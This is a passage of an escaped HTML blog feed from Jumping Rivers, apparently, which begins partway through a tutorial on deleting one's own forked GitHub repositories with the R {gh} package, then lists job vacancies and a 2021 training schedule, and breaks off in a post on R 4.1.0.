&lt;p&gt;The &lt;a href="https://cran.r-project.org/web/packages/gh/" rel="external"&gt;{gh}&lt;/a&gt; package provides an
R-user-friendly wrapper around the GitHub API. It lets you interact with
GitHub to e.g. create new repositories or delete old ones directly from
RStudio. The package is on CRAN and is installed in the usual way&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;install.packages&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;gh&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;To use the package, you first need to generate a Personal Access Token
(PAT).&lt;/p&gt;
&lt;h3 id="getting-a-token"&gt;Getting a token&lt;/h3&gt;
&lt;p&gt;&lt;a href="https://docs.github.com/en/github/authenticating-to-github/keeping-your-account-and-data-secure/creating-a-personal-access-token" rel="external"&gt;Creating a personal access
token&lt;/a&gt;
to be able to use the GitHub API is easy. You can either navigate to the
page on GitHub (Settings &amp;gt; Developer Settings &amp;gt; Personal Access tokens
&amp;gt; Generate new token), or you can use the handy &lt;code&gt;create_github_token()&lt;/code&gt;
function from &lt;a href="https://github.com/r-lib/usethis" rel="external"&gt;{usethis}&lt;/a&gt; which will
open the same page in your browser.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;usethis&lt;span style="color:#ff7b72;font-weight:bold"&gt;::&lt;/span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;create_github_token&lt;/span&gt;()
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;img src="https://www.jumpingrivers.com/blog/github-clean-remove-forks/new-token.png" title="Adding a new Personal access token." alt="Adding a new Personal access token." style="display: block; margin: auto;" /&gt;
&lt;p&gt;From there, you give your token a useful name as well as select what
access should be granted by the token. Note: if you want to use {gh} to
delete unwanted forked repositories, you will need to select the
&lt;em&gt;delete_repo&lt;/em&gt; scope.&lt;/p&gt;
&lt;img src="https://www.jumpingrivers.com/blog/github-clean-remove-forks/token-delete-scope.png" title="Setting the delete_repo scope for your token." alt="Setting the delete_repo scope for your token." style="display: block; margin: auto;" /&gt;
&lt;p&gt;However, be aware that this allows you to delete any repo - not just
forked ones. After deciding on the scopes, you generate your token. As
the page tells you, you will have to store your token somewhere as you
won’t be able to access it again after closing the page. We recommend
copying it and storing it in a password manager such as LastPass. Once
you have saved your token somewhere secure, you can make it available to
your R environment using the &lt;code&gt;set_github_pat()&lt;/code&gt; function from the
&lt;a href="https://github.com/r-lib/credentials" rel="external"&gt;{credentials}&lt;/a&gt; package which will
prompt you to enter your PAT, which you did save somewhere… right? If
you did not follow our advice and now no longer have access to your PAT,
don’t worry, you can delete the old one on GitHub and generate a new
one.&lt;/p&gt;
&lt;img src="https://www.jumpingrivers.com/blog/github-clean-remove-forks/view-existing-tokens.png" title="Viewing existing tokens" alt="Viewing existing tokens" style="display: block; margin: auto;" /&gt;
&lt;p&gt;OK, now that you’ve definitely got your token ready, you can run the
code below&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;credentials&lt;span style="color:#ff7b72;font-weight:bold"&gt;::&lt;/span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;set_github_pat&lt;/span&gt;()
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;which will prompt you to enter your PAT. Now you can finally get to the
cleaning!&lt;/p&gt;
&lt;h3 id="cleaning"&gt;Cleaning&lt;/h3&gt;
&lt;p&gt;We will load the {gh} package, as well as the {magrittr} package to get
access to pipes.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;library&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;gh&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;library&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;magrittr&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;Step one is to retrieve your repositories&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;my_username &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;your_username_goes_here&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;my_repos &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;gh&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;GET /users/:owner/repos&amp;#34;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; owner &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; my_username,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; page &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;1&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; per_page &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;100&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;The GitHub API is paginated. This means it returns results in pages,
with at most 100 results per page. If&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;length&lt;/span&gt;(my_repos)
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;is less than 100, then you don’t need to worry. If it is exactly 100,
there may be more repositories on later pages; you can either request a specific page or loop through all
pages.&lt;/p&gt;
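&lt;p&gt;Looping through the pages could be sketched as follows. The helper &lt;code&gt;get_all_pages()&lt;/code&gt; is our own hypothetical function, not part of {gh}; it keeps requesting pages until one comes back with fewer than &lt;code&gt;per_page&lt;/code&gt; results.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;# Hypothetical helper: fetch_page is any function(page, per_page)
# that returns a list of results for that page
get_all_pages = function(fetch_page, per_page = 100) {
  results = list()
  page = 1
  repeat {
    current = fetch_page(page, per_page)
    results = c(results, current)
    # A page that is not full must be the last one
    if (length(current) != per_page) break
    page = page + 1
  }
  results
}

# Not run here, since it needs a PAT and network access
# my_repos = get_all_pages(function(page, per_page) {
#   gh::gh(&amp;#34;GET /users/:owner/repos&amp;#34;, owner = my_username,
#          page = page, per_page = per_page)
# })
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;The {gh} documentation also describes a &lt;code&gt;.limit&lt;/code&gt; argument to &lt;code&gt;gh()&lt;/code&gt; that can be used instead of manual pagination; check the help page for your installed version before relying on it.&lt;/p&gt;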
&lt;p&gt;The object &lt;code&gt;my_repos&lt;/code&gt; is now a list of repositories. Each element of the
list is a particular repository. We are interested in two particular
elements: &lt;code&gt;name&lt;/code&gt; and &lt;code&gt;fork&lt;/code&gt;:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;my_repos[[1]]&lt;span style="color:#ff7b72;font-weight:bold"&gt;$&lt;/span&gt;name
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;my_repos[[1]]&lt;span style="color:#ff7b72;font-weight:bold"&gt;$&lt;/span&gt;fork
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;These elements tell us the name of the repository and whether it was
created as a result of forking. Now we just repeat this process for all
of our repositories and filter to return only the repositories which are
forked.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;forked_repos &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; purrr&lt;span style="color:#ff7b72;font-weight:bold"&gt;::&lt;/span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;map_dfr&lt;/span&gt;(my_repos, &lt;span style="color:#ff7b72;font-weight:bold"&gt;~&lt;/span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;unlist&lt;/span&gt;(.x&lt;span style="color:#d2a8ff;font-weight:bold"&gt;[c&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;name&amp;#34;&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;&amp;#34;fork&amp;#34;&lt;/span&gt;)])) &lt;span style="color:#ff7b72;font-weight:bold"&gt;%&amp;gt;%&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; dplyr&lt;span style="color:#ff7b72;font-weight:bold"&gt;::&lt;/span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;filter&lt;/span&gt;(fork &lt;span style="color:#ff7b72;font-weight:bold"&gt;==&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;TRUE&amp;#34;&lt;/span&gt;) &lt;span style="color:#8b949e;font-style:italic"&gt;# Here &amp;#34;TRUE&amp;#34; is a character, not a logical&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;The next step involves manually, and very &lt;strong&gt;carefully&lt;/strong&gt;, selecting the
repositories you want to delete. If you want to delete all forked
repositories (!), simply set&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# You probably don&amp;#39;t want to do this!&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;to_delete &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; forked_repos&lt;span style="color:#ff7b72;font-weight:bold"&gt;$&lt;/span&gt;name
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;Otherwise, create a vector of repositories to delete&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;to_delete &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;c&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;bob-does-tidytuesday&amp;#34;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;melindas-cool-project&amp;#34;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;a-random-r-package&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;Finally we delete using&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;purrr&lt;span style="color:#ff7b72;font-weight:bold"&gt;::&lt;/span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;map&lt;/span&gt;(to_delete,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#ff7b72;font-weight:bold"&gt;~&lt;/span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;gh&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;DELETE /repos/:owner/:repo&amp;#34;&lt;/span&gt;, owner &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; my_username, repo &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; .x))
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;And… they’re gone!&lt;/p&gt;
&lt;p&gt;Deleting forked repositories like this is an effective way to clean out
your GitHub of repositories that you haven’t looked at or touched in a
while. However, unlike doing it manually, there is no confirmation where
you have to type out a specific repository’s name to confirm that you
actually are deleting what you want to be deleting. So, be extremely
careful when deleting repositories using {gh} as you don’t want to lose
hours of work by accidentally running the wrong line.&lt;/p&gt;
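&lt;p&gt;One way to reduce that risk is to add your own guard before the delete call. The sketch below is only a suggestion: &lt;code&gt;confirm_forks()&lt;/code&gt; is a hypothetical helper of our own that refuses to continue if any name is not in the list of known forks, and the commented-out part asks for a typed confirmation in an interactive session.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;# Hypothetical safety check: stop if any requested name is not a known fork
confirm_forks = function(to_delete, fork_names) {
  unknown = setdiff(to_delete, fork_names)
  if (length(unknown) != 0) {
    stop(&amp;#34;Not forks, refusing to delete: &amp;#34;, paste(unknown, collapse = &amp;#34;, &amp;#34;))
  }
  to_delete
}

# Not run: needs the objects created earlier and a PAT with the delete_repo scope
# to_delete = confirm_forks(to_delete, forked_repos$name)
# print(to_delete)
# if (interactive()) {
#   answer = readline(&amp;#34;Type &amp;#39;delete&amp;#39; to remove these repositories: &amp;#34;)
#   if (identical(answer, &amp;#34;delete&amp;#34;)) {
#     purrr::map(to_delete,
#                ~gh(&amp;#34;DELETE /repos/:owner/:repo&amp;#34;, owner = my_username, repo = .x))
#   }
# }
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;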
&lt;p&gt;
For updates and revisions to this article, see the &lt;a href = "https://www.jumpingrivers.com/blog/github-clean-remove-forks/"&gt;original post&lt;/a&gt;
&lt;/p&gt;</description></item><item><title>Job vacancies at Jumping Rivers!</title><link>https://www.jumpingrivers.com/blog/job-vacancies-data-engineer-and-scientist/</link><pubDate>Tue, 01 Jun 2021 23:59:00 +0000</pubDate><guid>https://www.jumpingrivers.com/blog/job-vacancies-data-engineer-and-scientist/</guid><description>
&lt;p&gt;
&lt;a href = "https://www.jumpingrivers.com/blog/job-vacancies-data-engineer-and-scientist/"&gt;
&lt;img src="https://www.jumpingrivers.com/blog/job-vacancies-data-engineer-and-scientist/featured.png " width="400" style="width:400px" class="image-center" style="display: block; margin: auto;" /&gt;
&lt;/a&gt;
&lt;/p&gt;
&lt;p&gt;In line with the continued growth at Jumping Rivers, we are looking to
expand our team of dedicated professionals. If you
are enthusiastic and keen to develop your skills in cutting-edge data
science or infrastructure, please read on!&lt;/p&gt;
&lt;h2 id="who-are-we-and-what-do-we-do"&gt;Who are we and what do we do?&lt;/h2&gt;
&lt;p&gt;&lt;a href="https://www.jumpingrivers.com/" rel="external"&gt;Jumping Rivers&lt;/a&gt; is an analytics company
whose passion is data and machine learning. We help our clients move
from data storage to data insights. The company has three key strands:
training, data engineering and machine learning consultancy. As a small
company, the roles are rarely clear cut. We think this is a good thing;
the team get to experience different ideas and concepts, never stuck on
mundane tasks.&lt;/p&gt;
&lt;h2 id="where-are-we-based"&gt;Where are we based?&lt;/h2&gt;
&lt;p&gt;We are based in Newcastle upon Tyne in the &lt;a href="https://www.thecatalystnewcastle.co.uk/" rel="external"&gt;Catalyst
Building&lt;/a&gt; - home to the
&lt;a href="https://www.ncl.ac.uk/nicd/" rel="external"&gt;National Innovation Centre for Data&lt;/a&gt;. But
half the company is remote (within the UK). We trust our team to manage
their own time. If you want to go for a run in the afternoon and work later,
that’s fine with us!&lt;/p&gt;
&lt;p&gt;If you are based near Newcastle, then you can come into our office.
Alternatively, work wherever is convenient (provided you can get to London
and/or Edinburgh in reasonable time).&lt;/p&gt;
&lt;p&gt;We currently have two active job vacancies that we are accepting
applications for. The job titles and their corresponding specifications
can be viewed by clicking on the links below:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href="https://jumping-rivers.welcomekit.co/jobs/junior-infrastructure-engineer-uk-remote_newcastle-upon-tyne" rel="external"&gt;Junior Infrastructure
Engineer&lt;/a&gt;
(01/07/2021 deadline)&lt;/li&gt;
&lt;li&gt;&lt;a href="https://jumping-rivers.welcomekit.co/jobs/data-scientist-training-uk-remote_newcastle-upon-tyne" rel="external"&gt;Data Scientist + Training (UK
Remote)&lt;/a&gt;
(06/06/2021 deadline)&lt;/li&gt;
&lt;/ul&gt;
&lt;h2 id="dont-see-a-position-that-suits-your-skills"&gt;Don’t see a position that suits your skills?&lt;/h2&gt;
&lt;p&gt;Jumping Rivers is always looking for great talent. Send us an
&lt;a href="https://jumping-rivers.welcomekit.co/jobs/spontaneous-applications" rel="external"&gt;application&lt;/a&gt;
and we may consider you for an alternative role in our teams!&lt;/p&gt;
&lt;p&gt;If you would like to get in touch directly with any queries then please
email us at &lt;a href="mailto:careers@jumpingrivers.com" rel="external"&gt;careers@jumpingrivers.com&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;
For updates and revisions to this article, see the &lt;a href = "https://www.jumpingrivers.com/blog/job-vacancies-data-engineer-and-scientist/"&gt;original post&lt;/a&gt;
&lt;/p&gt;</description></item><item><title>Jumping Rivers 2021 Online Training Schedule</title><link>https://www.jumpingrivers.com/blog/jumping-rivers-2021-online-training-schedule/</link><pubDate>Tue, 18 May 2021 23:59:00 +0000</pubDate><guid>https://www.jumpingrivers.com/blog/jumping-rivers-2021-online-training-schedule/</guid><description>
&lt;p&gt;
&lt;a href = "https://www.jumpingrivers.com/blog/jumping-rivers-2021-online-training-schedule/"&gt;
&lt;img src="https://www.jumpingrivers.com/blog/jumping-rivers-2021-online-training-schedule/featured.jpg " width="400" style="width:400px" class="image-center" style="display: block; margin: auto;" /&gt;
&lt;/a&gt;
&lt;/p&gt;
&lt;p&gt;Good news! In tandem with the loosening of lockdown restrictions,
Jumping Rivers has released the updated 2021 public, online training
course schedule. We are offering courses across multiple programming
languages, including R, Python, Stan, Scala and Git. In the past year,
we have converted all of our courses to be online friendly and have
received great feedback in relation to interactivity, course structure
and overall attendee satisfaction. Some examples of feedback we have
received can be seen below:&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;“The live coding was well structured and the screen share made it very
immersive.”&lt;/p&gt;
&lt;/blockquote&gt;
&lt;blockquote&gt;
&lt;p&gt;“I thought the delivery of the content was well presented, and
extremely easy to follow”&lt;/p&gt;
&lt;/blockquote&gt;
&lt;blockquote&gt;
&lt;p&gt;“Lots of exercises to test knowledge as the course proceeded. Clear
explanations for everything. Friendly and engaging presenter.”&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;Early bird offers are currently available for selected courses and all
courses come with a 25% student/academic discount. A summary of the
training courses on offer can be seen below:&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;June:&lt;/strong&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;
&lt;p&gt;&lt;a href="https://www.jumpingrivers.com/training/course/r-introduction-tidyverse-readr-ggplot2-dplyr/" rel="external"&gt;&lt;strong&gt;Introduction to
R:&lt;/strong&gt;&lt;/a&gt;
Learn the fundamentals of R and how to import, summarise and plot
data using the {tidyverse}.&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;&lt;a href="https://www.jumpingrivers.com/training/course/r-programming-functions-looping-conditionals/" rel="external"&gt;&lt;strong&gt;Programming with
R:&lt;/strong&gt;&lt;/a&gt;
Fundamental R techniques such as functions, for loops and
conditional expressions.&lt;/p&gt;
&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;&lt;strong&gt;July:&lt;/strong&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;
&lt;p&gt;&lt;a href="https://www.jumpingrivers.com/training/course/r-statistics-modelling-linear-regression-clustering/" rel="external"&gt;&lt;strong&gt;Statistical Modelling with
R:&lt;/strong&gt;&lt;/a&gt;
Learn how to apply statistical methods such as hypothesis testing,
regression analysis, clustering and principal components analysis
(PCA).&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;&lt;a href="https://www.jumpingrivers.com/training/course/r-best-practices/" rel="external"&gt;&lt;strong&gt;Best Practices with
R:&lt;/strong&gt;&lt;/a&gt;
So you can write code? Great. But can you write code which is easy
to read, simple to maintain, reproducible and efficient?&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;&lt;a href="https://www.jumpingrivers.com/training/course/introduction-bayesian-inference-rstan-monte-carlo/" rel="external"&gt;&lt;strong&gt;Introduction to Bayesian
Inference:&lt;/strong&gt;&lt;/a&gt;
A course on MCMC algorithms, Bayesian workflows and much more!&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;&lt;a href="https://www.jumpingrivers.com/training/course/introduction-bayesian-inference-pystan-monte-carlo/" rel="external"&gt;&lt;strong&gt;Introduction to Bayesian Inference using
PyStan:&lt;/strong&gt;&lt;/a&gt;
Learn how to apply Bayesian inference/MCMC methods using Python’s
interface to Stan, PyStan.&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;&lt;a href="https://www.jumpingrivers.com/training/course/introduction-bayesian-inference-rstan-monte-carlo/" rel="external"&gt;&lt;strong&gt;Introduction to Bayesian Inference using
RStan:&lt;/strong&gt;&lt;/a&gt;
Learn how to apply Bayesian inference/MCMC methods using R’s
interface to Stan, RStan.&lt;/p&gt;
&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;&lt;strong&gt;August:&lt;/strong&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href="https://www.jumpingrivers.com/training/course/git-for-me/" rel="external"&gt;&lt;strong&gt;Git For
Me:&lt;/strong&gt;&lt;/a&gt; A
Git course on the importance of tracking project progress via
version control.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;&lt;strong&gt;September:&lt;/strong&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;
&lt;p&gt;&lt;a href="https://www.jumpingrivers.com/training/course/python-introduction-visualisation-manipulation/" rel="external"&gt;&lt;strong&gt;Introduction to
Python:&lt;/strong&gt;&lt;/a&gt;
An introductory Python course on importing, summarising and plotting
data.&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;&lt;a href="https://www.jumpingrivers.com/training/course/python-programming-control-flow-functions/" rel="external"&gt;&lt;strong&gt;Programming with
Python:&lt;/strong&gt;&lt;/a&gt;
An insight into fundamental Python techniques such as functions, for
loops and conditional expressions.&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;&lt;a href="https://www.jumpingrivers.com/training/course/python-graphics-visualisation-matplotlib-seaborn-plotly/" rel="external"&gt;&lt;strong&gt;Python for Data
Visualisation:&lt;/strong&gt;&lt;/a&gt;
Examining Python packages used for building impactful visualisations
that communicate your data insights.&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;&lt;a href="https://www.jumpingrivers.com/training/course/scala-statistical-computing-data-science-apache-spark/" rel="external"&gt;&lt;strong&gt;Scala for Statistical Computing and Data
Science:&lt;/strong&gt;&lt;/a&gt;
A Scala course covering how to manage builds and library
dependencies, Apache Spark and the Breeze Scala library.&lt;/p&gt;
&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;&lt;strong&gt;October:&lt;/strong&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;
&lt;p&gt;&lt;a href="https://www.jumpingrivers.com/training/course/python-tensorflow-machine-learning/" rel="external"&gt;&lt;strong&gt;Python and
Tensorflow:&lt;/strong&gt;&lt;/a&gt;
Learn the main ideas of deep learning and how to implement them in
practice with tensorflow.&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;&lt;a href="https://www.jumpingrivers.com/training/course/r-advanced-graphics-ggplot2-plotly-themes-scaling-faceting/" rel="external"&gt;&lt;strong&gt;Advanced Graphics with
R:&lt;/strong&gt;&lt;/a&gt;
Learn the much coveted {ggplot2} package. The {ggplot2} package can
create advanced and informative graphics.&lt;/p&gt;
&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;&lt;strong&gt;November:&lt;/strong&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;
&lt;p&gt;&lt;a href="https://www.jumpingrivers.com/training/course/r-spatial-analysis-sf-tmap-leaflet/" rel="external"&gt;&lt;strong&gt;Spatial Data Analysis with
R:&lt;/strong&gt;&lt;/a&gt;
Learn how to apply R’s powerful suite of geographical tools to
your own problems.&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;&lt;a href="https://www.jumpingrivers.com/training/course/reporting-r-markdown-dashboards/" rel="external"&gt;&lt;strong&gt;Reporting with R
Markdown:&lt;/strong&gt;&lt;/a&gt;
Learn how to dynamically create static/interactive documents and
automate the regeneration of these reports when the underlying data
changes.&lt;/p&gt;
&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;For further information on any of our upcoming courses please visit our
&lt;a href="https://www.jumpingrivers.com/training/public/" rel="external"&gt;public course page&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;If you would like to get in touch directly with any queries then please
email us at &lt;a href="mailto:hello@jumpingrivers.com" rel="external"&gt;hello@jumpingrivers.com&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;
For updates and revisions to this article, see the &lt;a href = "https://www.jumpingrivers.com/blog/jumping-rivers-2021-online-training-schedule/"&gt;original post&lt;/a&gt;
&lt;/p&gt;</description></item><item><title>New features in R 4.1.0</title><link>https://www.jumpingrivers.com/blog/new-features-r410-pipe-anonymous-functions/</link><pubDate>Mon, 17 May 2021 23:59:00 +0000</pubDate><guid>https://www.jumpingrivers.com/blog/new-features-r410-pipe-anonymous-functions/</guid><description>
&lt;p&gt;
&lt;a href = "https://www.jumpingrivers.com/blog/new-features-r410-pipe-anonymous-functions/"&gt;
&lt;img src="https://www.jumpingrivers.com/blog/new-features-r410-pipe-anonymous-functions/featured.jpg " width="400" style="width:400px" class="image-center" style="display: block; margin: auto;" /&gt;
&lt;/a&gt;
&lt;/p&gt;
&lt;h1 id="r-410-is-released"&gt;R-4.1.0 is released!&lt;/h1&gt;
&lt;p&gt;Rejoice! A new R release (v 4.1.0) is due on 18th May 2021. Typically,
major R releases don’t contain that many new features, but this
release does contain some interesting and important changes.&lt;/p&gt;
&lt;p&gt;This post summarises some of the notable changes introduced. More detail
on the changes can be found at the &lt;a href="https://cran.r-project.org/doc/manuals/r-devel/NEWS.html" rel="external"&gt;R
changelog&lt;/a&gt;.&lt;/p&gt;
&lt;h2 id="declining-support-for-32-bit-windows"&gt;Declining support for 32-bit Windows&lt;/h2&gt;
&lt;p&gt;The 4.1.x series will be the last to support 32-bit Windows systems.
This won’t affect most people, but if you have an old laptop you use for
occasional R fun, then this might cause an issue.&lt;/p&gt;
&lt;h2 id="new-syntax"&gt;New syntax&lt;/h2&gt;
&lt;p&gt;The stability of the base packages is a great strength of the R
ecosystem: both underpinning, and contrasting with, the rapid pace at
